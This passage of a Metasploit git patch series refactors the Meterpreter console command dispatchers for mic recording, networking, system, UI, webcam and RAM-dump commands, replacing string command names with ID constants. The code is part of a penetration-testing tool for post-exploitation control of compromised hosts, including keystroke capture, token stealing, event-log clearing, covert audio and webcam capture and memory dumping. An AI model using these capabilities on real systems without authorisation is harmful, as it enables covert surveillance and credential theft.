+        print_line(mic_start_opts.usage)
+        return
+      when "-d"
+        duration = val.to_i
+      when "-m"
+        device_id = val.to_i
+      when "-s"
+        saved_audio_path = val
+      end
+    end
+
+    mic_list = client.mic.mic_list
+    if mic_list.length == 0
+      print_error("Target does not have a mic")
+      return
+    end
+    if device_id < 1 || device_id > mic_list.length
+      print_error("Target does not have a mic with an id of #{device_id}")
+      return
+    end
+
+    channel = client.mic.mic_start(device_id)
+    if channel.nil?
+      print_error("Mic failed to start streaming.")
+      return
+    end
+    print_status("Saving to audio file: #{saved_audio_path}")
+    print_status("Streaming started...")
+    total_data_len = 0
+    begin
+      ::File.open(saved_audio_path, 'wb') do |outfile|
+        audio_file_wave_header(sample_rate_hz: 11025, num_channels: 1, bits_per_sample: 16, data_size: 2_000_000_000).each {
+          |e| e.write(outfile)
+        }
+      end
+      ::Timeout.timeout(duration) do
+        while client do
+          Rex::sleep(0.5)
+          total_data_len += get_data.call(channel, saved_audio_path)
         end
       end
+    rescue ::Timeout::Error
+    ensure
+      total_data_len += get_data.call(channel, saved_audio_path)
+      client.mic.mic_stop
+      print_status("Streaming stopped.")
+      # Now that we know the actual length of data, update the file header.
+      ::File.open(saved_audio_path, 'rb+') do |outfile|
+        outfile.seek(0, ::IO::SEEK_SET)
+        audio_file_wave_header(sample_rate_hz: 11025, num_channels: 1, bits_per_sample: 16, data_size: total_data_len).each {
+          |e| e.write(outfile)
+        }
+      end
+    end
+  end
+
+  def cmd_listen(*args)
+    filename = nil
+
+    listen_opts = Rex::Parser::Arguments.new(
+      "-h" => [ false, "Help Banner" ],
+      "-f" => [ true, "audio filename" ]
+    )
+
+    listen_opts.parse(args) do |opt, _idx, val|
+      case opt
+      when "-h"
+        print_line("Usage: listen -f <filename>\n")
+        print_line("Plays saved audio from a file.")
+        print_line(listen_opts.usage)
+        return
+      when "-f"
+        filename = val
+      end
     end
+
+    if filename.nil?
+      print_error("use '-f' option to provide a filename for playback")
+      return
+    end
+
+    Rex::Compat.play_sound(::File.expand_path(filename))
+  end
+
+  def cmd_mic_stop
+    client.mic.mic_stop
   end
 end
+end
+end
+end
+end
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/net.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/net.rb
index ea6ef112a3776..dc07701c9cda4 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/net.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/net.rb
@@ -90,22 +90,22 @@ def commands
     }
 
     reqs = {
-      'ipconfig' => ['stdapi_net_config_get_interfaces'],
-      'ifconfig' => ['stdapi_net_config_get_interfaces'],
+      'ipconfig' => [COMMAND_ID_STDAPI_NET_CONFIG_GET_INTERFACES],
+      'ifconfig' => [COMMAND_ID_STDAPI_NET_CONFIG_GET_INTERFACES],
       'route'    => [
         # Also uses these, but we don't want to be unable to list them
         # just because we can't alter them.
-        #'stdapi_net_config_add_route',
-        #'stdapi_net_config_remove_route',
-        'stdapi_net_config_get_routes'
+        #COMMAND_ID_STDAPI_NET_CONFIG_ADD_ROUTE,
+        #COMMAND_ID_STDAPI_NET_CONFIG_REMOVE_ROUTE,
+        COMMAND_ID_STDAPI_NET_CONFIG_GET_ROUTES
       ],
       # Only creates tcp channels, which is something whose availability
       # we can't check directly at the moment.
       'portfwd'  => [],
-      'arp'      => ['stdapi_net_config_get_arp_table'],
-      'netstat'  => ['stdapi_net_config_get_netstat'],
-      'getproxy' => ['stdapi_net_config_get_proxy'],
-      'resolve'  => ['stdapi_net_resolve_host'],
+      'arp'      => [COMMAND_ID_STDAPI_NET_CONFIG_GET_ARP_TABLE],
+      'netstat'  => [COMMAND_ID_STDAPI_NET_CONFIG_GET_NETSTAT],
+      'getproxy' => [COMMAND_ID_STDAPI_NET_CONFIG_GET_PROXY],
+      'resolve'  => [COMMAND_ID_STDAPI_NET_RESOLVE_HOST],
     }
 
     filter_commands(all, reqs)
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb
index 00b0b5eb58782..4d609a7b743ea 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb
@@ -106,64 +106,70 @@ class Console::CommandDispatcher::Stdapi::Sys
   #
   def commands
     all = {
-      "clearev"     => "Clear the event log",
-      "drop_token"  => "Relinquishes any active impersonation token.",
-      "execute"     => "Execute a command",
-      "getpid"      => "Get the current process identifier",
-      "getprivs"    => "Attempt to enable all privileges available to the current process",
-      "getuid"      => "Get the user that the server is running as",
-      "getsid"      => "Get the SID of the user that the server is running as",
-      "getenv"      => "Get one or more environment variable values",
-      "kill"        => "Terminate a process",
-      "pkill"       => "Terminate processes by name",
-      "pgrep"       => "Filter processes by name",
-      "ps"          => "List running processes",
-      "reboot"      => "Reboots the remote computer",
-      "reg"         => "Modify and interact with the remote registry",
-      "rev2self"    => "Calls RevertToSelf() on the remote machine",
-      "shell"       => "Drop into a system command shell",
-      "shutdown"    => "Shuts down the remote computer",
-      "steal_token" => "Attempts to steal an impersonation token from the target process",
-      "suspend"     => "Suspends or resumes a list of processes",
-      "sysinfo"     => "Gets information about the remote system, such as OS",
-      "localtime"   => "Displays the target system's local date and time",
+      'clearev'     => 'Clear the event log',
+      'drop_token'  => 'Relinquishes any active impersonation token.',
+      'execute'     => 'Execute a command',
+      'getpid'      => 'Get the current process identifier',
+      'getprivs'    => 'Attempt to enable all privileges available to the current process',
+      'getuid'      => 'Get the user that the server is running as',
+      'getsid'      => 'Get the SID of the user that the server is running as',
+      'getenv'      => 'Get one or more environment variable values',
+      'kill'        => 'Terminate a process',
+      'pkill'       => 'Terminate processes by name',
+      'pgrep'       => 'Filter processes by name',
+      'ps'          => 'List running processes',
+      'reboot'      => 'Reboots the remote computer',
+      'reg'         => 'Modify and interact with the remote registry',
+      'rev2self'    => 'Calls RevertToSelf() on the remote machine',
+      'shell'       => 'Drop into a system command shell',
+      'shutdown'    => 'Shuts down the remote computer',
+      'steal_token' => 'Attempts to steal an impersonation token from the target process',
+      'suspend'     => 'Suspends or resumes a list of processes',
+      'sysinfo'     => 'Gets information about the remote system, such as OS',
+      'localtime'   => 'Displays the target system local date and time',
     }
     reqs = {
-      "clearev"     => [ "stdapi_sys_eventlog_open", "stdapi_sys_eventlog_clear" ],
-      "drop_token"  => [ "stdapi_sys_config_drop_token" ],
-      "execute"     => [ "stdapi_sys_process_execute" ],
-      "getpid"      => [ "stdapi_sys_process_getpid"	],
-      "getprivs"    => [ "stdapi_sys_config_getprivs" ],
-      "getuid"      => [ "stdapi_sys_config_getuid" ],
-      "getsid"      => [ "stdapi_sys_config_getsid" ],
-      "getenv"      => [ "stdapi_sys_config_getenv" ],
-      "kill"        => [ "stdapi_sys_process_kill" ],
-      "pkill"       => [ "stdapi_sys_process_kill", "stdapi_sys_process_get_processes" ],
-      "pgrep"       => [ "stdapi_sys_process_get_processes" ],
-      "ps"          => [ "stdapi_sys_process_get_processes" ],
-      "reboot"      => [ "stdapi_sys_power_exitwindows" ],
-      "reg"	      => [
-        "stdapi_registry_load_key",
-        "stdapi_registry_unload_key",
-        "stdapi_registry_open_key",
-        "stdapi_registry_open_remote_key",
-        "stdapi_registry_create_key",
-        "stdapi_registry_delete_key",
-        "stdapi_registry_close_key",
-        "stdapi_registry_enum_key",
-        "stdapi_registry_set_value",
-        "stdapi_registry_query_value",
-        "stdapi_registry_delete_value",
-        "stdapi_registry_query_class",
-        "stdapi_registry_enum_value",
+      'clearev'     => [
+        COMMAND_ID_STDAPI_SYS_EVENTLOG_OPEN,
+        COMMAND_ID_STDAPI_SYS_EVENTLOG_CLEAR
       ],
-      "rev2self"    => [ "stdapi_sys_config_rev2self" ],
-      "shell"       => [ "stdapi_sys_process_execute" ],
-      "shutdown"    => [ "stdapi_sys_power_exitwindows" ],
-      "steal_token" => [ "stdapi_sys_config_steal_token" ],
-      "suspend"     => [ "stdapi_sys_process_attach"],
-      "sysinfo"     => [ "stdapi_sys_config_sysinfo" ],
-      "localtime"   => [ "stdapi_sys_config_localtime" ],
+      'drop_token'  => [COMMAND_ID_STDAPI_SYS_CONFIG_DROP_TOKEN],
+      'execute'     => [COMMAND_ID_STDAPI_SYS_PROCESS_EXECUTE],
+      'getpid'      => [COMMAND_ID_STDAPI_SYS_PROCESS_GETPID],
+      'getprivs'    => [COMMAND_ID_STDAPI_SYS_CONFIG_GETPRIVS],
+      'getuid'      => [COMMAND_ID_STDAPI_SYS_CONFIG_GETUID],
+      'getsid'      => [COMMAND_ID_STDAPI_SYS_CONFIG_GETSID],
+      'getenv'      => [COMMAND_ID_STDAPI_SYS_CONFIG_GETENV],
+      'kill'        => [COMMAND_ID_STDAPI_SYS_PROCESS_KILL],
+      'pkill'       => [
+        COMMAND_ID_STDAPI_SYS_PROCESS_KILL,
+        COMMAND_ID_STDAPI_SYS_PROCESS_GET_PROCESSES
+      ],
+      'pgrep'       => [COMMAND_ID_STDAPI_SYS_PROCESS_GET_PROCESSES],
+      'ps'          => [COMMAND_ID_STDAPI_SYS_PROCESS_GET_PROCESSES],
+      'reboot'      => [COMMAND_ID_STDAPI_SYS_POWER_EXITWINDOWS],
+      'reg'	      => [
+        COMMAND_ID_STDAPI_REGISTRY_LOAD_KEY,
+        COMMAND_ID_STDAPI_REGISTRY_UNLOAD_KEY,
+        COMMAND_ID_STDAPI_REGISTRY_OPEN_KEY,
+        COMMAND_ID_STDAPI_REGISTRY_OPEN_REMOTE_KEY,
+        COMMAND_ID_STDAPI_REGISTRY_CREATE_KEY,
+        COMMAND_ID_STDAPI_REGISTRY_DELETE_KEY,
+        COMMAND_ID_STDAPI_REGISTRY_CLOSE_KEY,
+        COMMAND_ID_STDAPI_REGISTRY_ENUM_KEY,
+        COMMAND_ID_STDAPI_REGISTRY_SET_VALUE,
+        COMMAND_ID_STDAPI_REGISTRY_QUERY_VALUE,
+        COMMAND_ID_STDAPI_REGISTRY_DELETE_VALUE,
+        COMMAND_ID_STDAPI_REGISTRY_QUERY_CLASS,
+        COMMAND_ID_STDAPI_REGISTRY_ENUM_VALUE,
+      ],
+      'rev2self'    => [COMMAND_ID_STDAPI_SYS_CONFIG_REV2SELF],
+      'shell'       => [COMMAND_ID_STDAPI_SYS_PROCESS_EXECUTE],
+      'shutdown'    => [COMMAND_ID_STDAPI_SYS_POWER_EXITWINDOWS],
+      'steal_token' => [COMMAND_ID_STDAPI_SYS_CONFIG_STEAL_TOKEN],
+      'suspend'     => [COMMAND_ID_STDAPI_SYS_PROCESS_ATTACH],
+      'sysinfo'     => [COMMAND_ID_STDAPI_SYS_CONFIG_SYSINFO],
+      'localtime'   => [COMMAND_ID_STDAPI_SYS_CONFIG_LOCALTIME],
     }
     filter_commands(all, reqs)
   end
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/ui.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/ui.rb
index 41dfae6f9f059..dfa36bff96a31 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/ui.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/ui.rb
@@ -23,39 +23,39 @@ class Console::CommandDispatcher::Stdapi::Ui
   #
   def commands
     all = {
-      "enumdesktops"  => "List all accessible desktops and window stations",
-      "getdesktop"    => "Get the current meterpreter desktop",
-      "idletime"      => "Returns the number of seconds the remote user has been idle",
-      "keyscan_dump"  => "Dump the keystroke buffer",
-      "keyscan_start" => "Start capturing keystrokes",
-      "keyscan_stop"  => "Stop capturing keystrokes",
-      "keyboard_send" => "Send keystrokes",
-      "keyevent"      => "Send key events",
-      "mouse"         => "Send mouse events",
-      "screenshot"    => "Grab a screenshot of the interactive desktop",
-      "screenshare"   => "Watch the remote user's desktop in real time",
-      "setdesktop"    => "Change the meterpreters current desktop",
-      "uictl"         => "Control some of the user interface components"
+      'enumdesktops'  => 'List all accessible desktops and window stations',
+      'getdesktop'    => 'Get the current meterpreter desktop',
+      'idletime'      => 'Returns the number of seconds the remote user has been idle',
+      'keyscan_dump'  => 'Dump the keystroke buffer',
+      'keyscan_start' => 'Start capturing keystrokes',
+      'keyscan_stop'  => 'Stop capturing keystrokes',
+      'keyboard_send' => 'Send keystrokes',
+      'keyevent'      => 'Send key events',
+      'mouse'         => 'Send mouse events',
+      'screenshot'    => 'Grab a screenshot of the interactive desktop',
+      'screenshare'   => 'Watch the remote user desktop in real time',
+      'setdesktop'    => 'Change the meterpreters current desktop',
+      'uictl'         => 'Control some of the user interface components'
       #  not working yet
-      # "unlockdesktop" => "Unlock or lock the workstation (must be inside winlogon.exe)",
+      # 'unlockdesktop' => 'Unlock or lock the workstation (must be inside winlogon.exe)',
     }
 
     reqs = {
-      "enumdesktops"  => [ "stdapi_ui_desktop_enum" ],
-      "getdesktop"    => [ "stdapi_ui_desktop_get" ],
-      "idletime"      => [ "stdapi_ui_get_idle_time" ],
-      "keyscan_dump"  => [ "stdapi_ui_get_keys_utf8" ],
-      "keyscan_start" => [ "stdapi_ui_start_keyscan" ],
-      "keyscan_stop"  => [ "stdapi_ui_stop_keyscan" ],
-      "keyevent"      => [ "stdapi_ui_send_keyevent" ],
-      "keyboard_send" => [ "stdapi_ui_send_keys" ],
-      "mouse"         => [ "stdapi_ui_send_mouse" ],
-      "screenshot"    => [ "stdapi_ui_desktop_screenshot" ],
-      "screenshare"   => [ "stdapi_ui_desktop_screenshot" ],
-      "setdesktop"    => [ "stdapi_ui_desktop_set" ],
-      "uictl"         => [
-        "stdapi_ui_enable_mouse",
-        "stdapi_ui_enable_keyboard"
+      'enumdesktops'  => [COMMAND_ID_STDAPI_UI_DESKTOP_ENUM],
+      'getdesktop'    => [COMMAND_ID_STDAPI_UI_DESKTOP_GET],
+      'idletime'      => [COMMAND_ID_STDAPI_UI_GET_IDLE_TIME],
+      'keyscan_dump'  => [COMMAND_ID_STDAPI_UI_GET_KEYS_UTF8],
+      'keyscan_start' => [COMMAND_ID_STDAPI_UI_START_KEYSCAN],
+      'keyscan_stop'  => [COMMAND_ID_STDAPI_UI_STOP_KEYSCAN],
+      'keyevent'      => [COMMAND_ID_STDAPI_UI_SEND_KEYEVENT],
+      'keyboard_send' => [COMMAND_ID_STDAPI_UI_SEND_KEYS],
+      'mouse'         => [COMMAND_ID_STDAPI_UI_SEND_MOUSE],
+      'screenshot'    => [COMMAND_ID_STDAPI_UI_DESKTOP_SCREENSHOT],
+      'screenshare'   => [COMMAND_ID_STDAPI_UI_DESKTOP_SCREENSHOT],
+      'setdesktop'    => [COMMAND_ID_STDAPI_UI_DESKTOP_SET],
+      'uictl'         => [
+        COMMAND_ID_STDAPI_UI_ENABLE_MOUSE,
+        COMMAND_ID_STDAPI_UI_ENABLE_KEYBOARD
       ]
     }
     filter_commands(all, reqs)
@@ -65,7 +65,7 @@ def commands
   # Name for this dispatcher.
   #
   def name
-    "Stdapi: User interface"
+    'Stdapi: User interface'
   end
 
   #
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/webcam.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/webcam.rb
index 47a760abd16c3..d897ceb75fad5 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/webcam.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/webcam.rb
@@ -22,18 +22,26 @@ class Console::CommandDispatcher::Stdapi::Webcam
   #
   def commands
     all = {
-      "webcam_chat"   => "Start a video chat",
-      "webcam_list"   => "List webcams",
-      "webcam_snap"   => "Take a snapshot from the specified webcam",
-      "webcam_stream" => "Play a video stream from the specified webcam",
-      "record_mic"    => "Record audio from the default microphone for X seconds"
+      'webcam_chat'   => 'Start a video chat',
+      'webcam_list'   => 'List webcams',
+      'webcam_snap'   => 'Take a snapshot from the specified webcam',
+      'webcam_stream' => 'Play a video stream from the specified webcam',
+      'record_mic'    => 'Record audio from the default microphone for X seconds'
     }
     reqs = {
-      "webcam_chat"   => [ "webcam_list" ],
-      "webcam_list"   => [ "webcam_list" ],
-      "webcam_snap"   => [ "webcam_start", "webcam_get_frame", "webcam_stop" ],
-      "webcam_stream" => [ "webcam_start", "webcam_get_frame", "webcam_stop" ],
-      "record_mic"    => [ "webcam_audio_record" ]
+      'webcam_chat'   => [COMMAND_ID_STDAPI_WEBCAM_LIST],
+      'webcam_list'   => [COMMAND_ID_STDAPI_WEBCAM_LIST],
+      'webcam_snap'   => [
+        COMMAND_ID_STDAPI_WEBCAM_START,
+        COMMAND_ID_STDAPI_WEBCAM_GET_FRAME,
+        COMMAND_ID_STDAPI_WEBCAM_STOP
+      ],
+      'webcam_stream' => [
+        COMMAND_ID_STDAPI_WEBCAM_START,
+        COMMAND_ID_STDAPI_WEBCAM_GET_FRAME,
+        COMMAND_ID_STDAPI_WEBCAM_STOP
+      ],
+      'record_mic'    => [COMMAND_ID_STDAPI_WEBCAM_AUDIO_RECORD]
     }
     filter_commands(all, reqs)
   end
@@ -42,7 +50,7 @@ def commands
   # Name for this dispatcher
   #
   def name
-    "Stdapi: Webcam"
+    'Stdapi: Webcam'
   end
 
   def cmd_webcam_list
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/winpmem.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/winpmem.rb
index d5793f28e5f6e..486f14150db02 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/winpmem.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/winpmem.rb
@@ -6,86 +6,87 @@ module Post
 module Meterpreter
 module Ui
 
-  class Console::CommandDispatcher::Winpmem
+class Console::CommandDispatcher::Winpmem
 
-    Klass = Console::CommandDispatcher::Winpmem
+  Klass = Console::CommandDispatcher::Winpmem
 
-    include Console::CommandDispatcher
+  include Console::CommandDispatcher
 
-    #
-    # Name for this dispatcher
-    #
-    def name
-      'Winpmem'
-    end
+  #
+  # Name for this dispatcher
+  #
+  def name
+    'Winpmem'
+  end
 
-    #
-    # List of supported commands.
-    #
-    def commands
-      {
-        'dump_ram'         => 'Dump victim RAM',
-      }
-    end
+  #
+  # List of supported commands.
+  #
+  def commands
+    {
+      'dump_ram' => 'Dump victim RAM',
+    }
+  end
 
-    WINPMEM_ERROR_SUCCESS = 0
-    WINPMEM_ERROR_FAILED_LOAD_DRIVER = 1
-    WINPMEM_ERROR_FAILED_MEMORY_GEOMETRY = 2
-    WINPMEM_ERROR_FAILED_ALLOCATE_MEMORY = 3
-    WINPMEM_ERROR_FAILED_METERPRETER_CHANNEL = 4
-    WINPMEM_ERROR_UNKNOWN = 255
+  WINPMEM_ERROR_SUCCESS = 0
+  WINPMEM_ERROR_FAILED_LOAD_DRIVER = 1
+  WINPMEM_ERROR_FAILED_MEMORY_GEOMETRY = 2
+  WINPMEM_ERROR_FAILED_ALLOCATE_MEMORY = 3
+  WINPMEM_ERROR_FAILED_METERPRETER_CHANNEL = 4
+  WINPMEM_ERROR_UNKNOWN = 255
 
-    def cmd_dump_ram(*args)
-      unless args[0]
-        print_error("Usage: dump_ram [output_file]")
-        return
-      end
-      path_raw = args[0]
+  def cmd_dump_ram(*args)
+    unless args[0]
+      print_error("Usage: dump_ram [output_file]")
+      return
+    end
+    path_raw = args[0]
 
-      fd = ::File.new(path_raw, 'wb+')
-      memory_size, response_code, channel = client.winpmem.dump_ram
-      case response_code
-      when WINPMEM_ERROR_FAILED_LOAD_DRIVER
-        print_error("Failed to load the driver")
-        return true
-      when WINPMEM_ERROR_FAILED_MEMORY_GEOMETRY
-        print_error("Failed to get the memory geometry")
-        return true
-      when WINPMEM_ERROR_FAILED_ALLOCATE_MEMORY
-        print_error("Failed to allocate memory")
-        return true
-      when WINPMEM_ERROR_FAILED_METERPRETER_CHANNEL
-        print_error("Failed to open the meterpreter Channel")
-        return true
-      end
-      print_good("Driver PMEM loaded successfully")
-      #Arbitrary big buffer size, could be optimized
-      buffer_size = 2 ** 17
-      bytes_read = 0
-      next_message_byte = memory_size / 10
-      print_good("Dumping #{memory_size} bytes (press Ctrl-C to abort)")
-      begin
+    fd = ::File.new(path_raw, 'wb+')
+    memory_size, response_code, channel = client.winpmem.dump_ram
+    case response_code
+    when WINPMEM_ERROR_FAILED_LOAD_DRIVER
+      print_error("Failed to load the driver")
+      return true
+    when WINPMEM_ERROR_FAILED_MEMORY_GEOMETRY
+      print_error("Failed to get the memory geometry")
+      return true
+    when WINPMEM_ERROR_FAILED_ALLOCATE_MEMORY
+      print_error("Failed to allocate memory")
+      return true
+    when WINPMEM_ERROR_FAILED_METERPRETER_CHANNEL
+      print_error("Failed to open the meterpreter Channel")
+      return true
+    end
+    print_good("Driver PMEM loaded successfully")
+    #Arbitrary big buffer size, could be optimized
+    buffer_size = 2 ** 17
+    bytes_read = 0
+    next_message_byte = memory_size / 10
+    print_good("Dumping #{memory_size} bytes (press Ctrl-C to abort)")
+    begin
+      data = channel.read(buffer_size)
+      until channel.eof || data.nil?
+        fd.write(data)
+        bytes_read += data.length
         data = channel.read(buffer_size)
-        until channel.eof || data.nil?
-          fd.write(data)
-          bytes_read += data.length
-          data = channel.read(buffer_size)
-          if bytes_read >= next_message_byte
-            print_good(((next_message_byte.to_f / memory_size) * 100).round.to_s + "% Downloaded")
-            next_message_byte += memory_size / 10
-          end
+        if bytes_read >= next_message_byte
+          print_good(((next_message_byte.to_f / memory_size) * 100).round.to_s + "% Downloaded")
+          next_message_byte += memory_size / 10
         end
-        print_status("Download completed")
-      ensure
-        print_status("Unloading driver")
-        fd.close
-        #Unload the driver on channel close
-        channel.close
       end
-      return true
+      print_status("Download completed")
+    ensure
+      print_status("Unloading driver")
+      fd.close
+      #Unload the driver on channel close
+      channel.close
     end
+    return true
   end
-  end
-  end
-  end
-  end
+end
+
+end
+end
+end
+end

From 364b7fac494d6f75c85ca63bc7b8278f9cc3f684 Mon Sep 17 00:00:00 2001
From: OJ <oj@buffered.io>
Date: Mon, 4 May 2020 15:06:34 +1000
Subject: [PATCH 05/20] Refactor of command ids into separate files

---
 lib/rex/post/meterpreter/client.rb            |   2 +-
 lib/rex/post/meterpreter/extension.rb         |   4 +-
 lib/rex/post/meterpreter/extension_mapper.rb  |  22 ++-
 .../meterpreter/extensions/android/android.rb |   2 +-
 .../extensions/android/command_ids.rb         |  33 +++++
 .../meterpreter/extensions/android/tlv.rb     |  21 ---
 .../meterpreter/extensions/appapi/appapi.rb   |   1 +
 .../extensions/appapi/command_ids.rb          |  20 +++
 .../post/meterpreter/extensions/appapi/tlv.rb |   9 --
 .../extensions/espia/command_ids.rb           |  18 +++
 .../meterpreter/extensions/espia/espia.rb     |   1 +
 .../post/meterpreter/extensions/espia/tlv.rb  |   6 -
 .../extensions/extapi/command_ids.rb          |  33 +++++
 .../meterpreter/extensions/extapi/extapi.rb   |   1 +
 .../post/meterpreter/extensions/extapi/tlv.rb |  21 ---
 .../extensions/incognito/command_ids.rb       |  23 +++
 .../extensions/incognito/incognito.rb         |   1 +
 .../meterpreter/extensions/incognito/tlv.rb   |  11 --
 .../extensions/kiwi/command_ids.rb            |  18 +++
 .../post/meterpreter/extensions/kiwi/kiwi.rb  |   1 +
 .../post/meterpreter/extensions/kiwi/tlv.rb   |   6 -
 .../extensions/lanattacks/command_ids.rb      |  26 ++++
 .../extensions/lanattacks/lanattacks.rb       |   1 +
 .../meterpreter/extensions/lanattacks/tlv.rb  |  14 --
 .../extensions/mimikatz/command_ids.rb        |  18 +++
 .../extensions/mimikatz/mimikatz.rb           |   1 +
 .../meterpreter/extensions/mimikatz/tlv.rb    |   6 -
 .../extensions/networkpug/command_ids.rb      |  19 +++
 .../extensions/networkpug/networkpug.rb       |   1 +
 .../meterpreter/extensions/networkpug/tlv.rb  |   7 -
 .../extensions/peinjector/command_ids.rb      |  18 +++
 .../extensions/peinjector/peinjector.rb       |   1 +
 .../meterpreter/extensions/peinjector/tlv.rb  |   6 -
 .../extensions/powershell/command_ids.rb      |  21 +++
 .../extensions/powershell/powershell.rb       |   1 +
 .../meterpreter/extensions/powershell/tlv.rb  |   9 --
 .../extensions/priv/command_ids.rb            |  24 ++++
 .../post/meterpreter/extensions/priv/priv.rb  |   1 +
 .../post/meterpreter/extensions/priv/tlv.rb   |  12 --
 .../extensions/python/command_ids.rb          |  19 +++
 .../meterpreter/extensions/python/python.rb   |   1 +
 .../post/meterpreter/extensions/python/tlv.rb |   8 --
 .../extensions/sniffer/command_ids.rb         |  24 ++++
 .../meterpreter/extensions/sniffer/sniffer.rb |   1 +
 .../meterpreter/extensions/sniffer/tlv.rb     |  12 --
 .../extensions/stdapi/command_ids.rb          | 132 ++++++++++++++++++
 .../meterpreter/extensions/stdapi/stdapi.rb   |   1 +
 .../post/meterpreter/extensions/stdapi/tlv.rb | 124 ----------------
 .../extensions/unhook/command_ids.rb          |  18 +++
 .../post/meterpreter/extensions/unhook/tlv.rb |   6 -
 .../meterpreter/extensions/unhook/unhook.rb   |   3 +-
 .../extensions/winpmem/command_ids.rb         |  18 +++
 .../meterpreter/extensions/winpmem/tlv.rb     |   6 -
 .../meterpreter/extensions/winpmem/winpmem.rb |   1 +
 .../ui/console/command_dispatcher/android.rb  |   3 +
 .../ui/console/command_dispatcher/appapi.rb   |   3 +
 .../console/command_dispatcher/extapi/adsi.rb |   2 +
 .../command_dispatcher/extapi/clipboard.rb    |   2 +
 .../command_dispatcher/extapi/service.rb      |   2 +
 .../command_dispatcher/extapi/window.rb       |   2 +
 .../console/command_dispatcher/extapi/wmi.rb  |   2 +
 .../command_dispatcher/lanattacks/dhcp.rb     |   2 +
 .../command_dispatcher/lanattacks/tftp.rb     |   2 +
 .../ui/console/command_dispatcher/sniffer.rb  |  36 ++---
 .../console/command_dispatcher/stdapi/fs.rb   |   4 +-
 .../console/command_dispatcher/stdapi/mic.rb  |   2 +
 .../console/command_dispatcher/stdapi/net.rb  |   8 +-
 .../console/command_dispatcher/stdapi/sys.rb  |   3 +-
 .../console/command_dispatcher/stdapi/ui.rb   |   8 +-
 .../command_dispatcher/stdapi/webcam.rb       |   2 +
 70 files changed, 575 insertions(+), 322 deletions(-)
 create mode 100644 lib/rex/post/meterpreter/extensions/android/command_ids.rb
 create mode 100644 lib/rex/post/meterpreter/extensions/appapi/command_ids.rb
 create mode 100644 lib/rex/post/meterpreter/extensions/espia/command_ids.rb
 create mode 100644 lib/rex/post/meterpreter/extensions/extapi/command_ids.rb
 create mode 100644 lib/rex/post/meterpreter/extensions/incognito/command_ids.rb
 create mode 100644 lib/rex/post/meterpreter/extensions/kiwi/command_ids.rb
 create mode 100644 lib/rex/post/meterpreter/extensions/lanattacks/command_ids.rb
 create mode 100644 lib/rex/post/meterpreter/extensions/mimikatz/command_ids.rb
 create mode 100644 lib/rex/post/meterpreter/extensions/networkpug/command_ids.rb
 create mode 100644 lib/rex/post/meterpreter/extensions/peinjector/command_ids.rb
 create mode 100644 lib/rex/post/meterpreter/extensions/powershell/command_ids.rb
 create mode 100644 lib/rex/post/meterpreter/extensions/priv/command_ids.rb
 create mode 100644 lib/rex/post/meterpreter/extensions/python/command_ids.rb
 create mode 100644 lib/rex/post/meterpreter/extensions/sniffer/command_ids.rb
 create mode 100644 lib/rex/post/meterpreter/extensions/stdapi/command_ids.rb
 create mode 100644 lib/rex/post/meterpreter/extensions/unhook/command_ids.rb
 create mode 100644 lib/rex/post/meterpreter/extensions/winpmem/command_ids.rb

diff --git a/lib/rex/post/meterpreter/client.rb b/lib/rex/post/meterpreter/client.rb
index 82caf1b4ace9d..8fa7c26a9c6eb 100644
--- a/lib/rex/post/meterpreter/client.rb
+++ b/lib/rex/post/meterpreter/client.rb
@@ -318,7 +318,7 @@ def method_missing(symbol, *args)
   #
   def add_extension(name, commands=[])
     self.commands |= []
-    self.commands.concat(commands.map {|v| Rex::Post::Meterpreter.command_id_to_method_string(v)})
+    self.commands.concat(commands)
 
     # Check to see if this extension has already been loaded.
     if ((klass = self.class.check_ext_hash(name.downcase)) == nil)
diff --git a/lib/rex/post/meterpreter/extension.rb b/lib/rex/post/meterpreter/extension.rb
index 4789c1d7684f7..7db256f222bf1 100644
--- a/lib/rex/post/meterpreter/extension.rb
+++ b/lib/rex/post/meterpreter/extension.rb
@@ -24,9 +24,9 @@ def initialize(client, name)
   #
   # The name of the extension.
   #
-  attr_reader :name
+  attr_accessor :name
 protected
-  attr_reader :client # :nodoc:
+  attr_accessor :client # :nodoc:
 end
 
 end; end; end
diff --git a/lib/rex/post/meterpreter/extension_mapper.rb b/lib/rex/post/meterpreter/extension_mapper.rb
index d062c54d40016..320ab7fc2585d 100644
--- a/lib/rex/post/meterpreter/extension_mapper.rb
+++ b/lib/rex/post/meterpreter/extension_mapper.rb
@@ -10,19 +10,31 @@ class ExtensionMapper
 
   def self.get_extension_id(name)
     k = self.get_extension_klass(name)
-    k.id
+    k.extension_id
   end
 
   def self.get_extension_klass(name)
-    name.capitalize!
+    name.downcase
 
     unless @@klasses[name]
-      require("rex/post/meterpreter/extensions/#{name.downcase}/#{name.downcase}")
-      s = name.to_sym
+      require("rex/post/meterpreter/extensions/#{name}/#{name}")
+      s = Rex::Post::Meterpreter::Extensions.constants.select { |c|
+        name == c.to_s.downcase
+      }[0]
       @@klasses[name] =  Rex::Post::Meterpreter::Extensions.const_get(s).const_get(s)
     end
 
-    @@klasses[name.downcase]
+    @@klasses[name]
+  end
+
+  def self.dump_extensions
+    base = ::File.join(File.dirname(__dir__), 'meterpreter/extensions')
+    names = ::Dir.entries(base).select { |e|
